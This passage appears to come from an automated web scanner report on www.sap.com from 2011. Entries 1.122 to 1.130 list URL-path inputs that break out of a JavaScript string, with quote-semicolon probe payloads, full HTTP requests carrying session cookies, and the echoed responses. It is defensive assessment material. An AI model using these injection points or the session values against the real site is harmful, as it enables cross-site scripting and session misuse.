Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34342
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:17:59 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:17:59 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:17:59 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global37f00';2a454ffd699';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.122. http://www.sap.com/global/ui/richmedia/js/utils/rm_console.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_console.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2702'%3b754dccb0264 was submitted in the REST URL parameter 1. This input was echoed as e2702';754dccb0264 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globale2702'%3b754dccb0264/ui/richmedia/js/utils/rm_console.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/country-selector.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CountryRedirectFlag=1; mbox=check#true#1321210906|session#1321210845752-117832#1321212706

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34342
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globale2702';754dccb0264';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.123. http://www.sap.com/global/ui/richmedia/js/utils/rm_data.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_data.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c50'%3ba5ea46ddd56 was submitted in the REST URL parameter 1. This input was echoed as 70c50';a5ea46ddd56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global70c50'%3ba5ea46ddd56/ui/richmedia/js/utils/rm_data.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34305
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:02 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global70c50';a5ea46ddd56';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.124. http://www.sap.com/global/ui/richmedia/js/utils/rm_dhtml.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_dhtml.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d57fe'%3bba8521573e5 was submitted in the REST URL parameter 1. This input was echoed as d57fe';ba8521573e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globald57fe'%3bba8521573e5/ui/richmedia/js/utils/rm_dhtml.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34312
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:02 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globald57fe';ba8521573e5';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.125. http://www.sap.com/global/ui/richmedia/js/utils/rm_getcss.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_getcss.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e15c9'%3bf8dfd0a7e53 was submitted in the REST URL parameter 1. This input was echoed as e15c9';f8dfd0a7e53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globale15c9'%3bf8dfd0a7e53/ui/richmedia/js/utils/rm_getcss.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:00 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:00 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:17:59 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globale15c9';f8dfd0a7e53';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.126. http://www.sap.com/global/ui/richmedia/js/utils/rm_indexOf.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_indexOf.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c4fe'%3b078b4ba85dc was submitted in the REST URL parameter 1. This input was echoed as 3c4fe';078b4ba85dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global3c4fe'%3b078b4ba85dc/ui/richmedia/js/utils/rm_indexOf.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/country-selector.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CountryRedirectFlag=1; mbox=check#true#1321210906|session#1321210845752-117832#1321212706

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34342
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global3c4fe';078b4ba85dc';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.127. http://www.sap.com/global/ui/richmedia/js/utils/rm_initializer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_initializer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34191'%3b4a807e85877 was submitted in the REST URL parameter 1. This input was echoed as 34191';4a807e85877 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global34191'%3b4a807e85877/ui/richmedia/js/utils/rm_initializer.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/country-selector.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34370
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:08 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:08 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global34191';4a807e85877';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.128. http://www.sap.com/global/ui/richmedia/js/utils/rm_uniqueId.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_uniqueId.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde53'%3b04827bcf38e was submitted in the REST URL parameter 1. This input was echoed as cde53';04827bcf38e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalcde53'%3b04827bcf38e/ui/richmedia/js/utils/rm_uniqueId.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/country-selector.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CountryRedirectFlag=1; mbox=check#true#1321210906|session#1321210845752-117832#1321212706

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34349
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:17 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:17 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:17 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalcde53';04827bcf38e';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.129. http://www.sap.com/global/unified/css/StageHeaderMainFooter.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/unified/css/StageHeaderMainFooter.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81ac5'%3bfaef581bb5b was submitted in the REST URL parameter 1. This input was echoed as 81ac5';faef581bb5b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global81ac5'%3bfaef581bb5b/unified/css/StageHeaderMainFooter.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34346
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global81ac5';faef581bb5b';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.130. http://www.sap.com/gwtservices/httpBridge.epx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd56'%3b4de52bd1857 was submitted in the REST URL parameter 1. This input was echoed as 9cd56';4de52bd1857 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gwtservices9cd56'%3b4de52bd1857/httpBridge.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9087
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
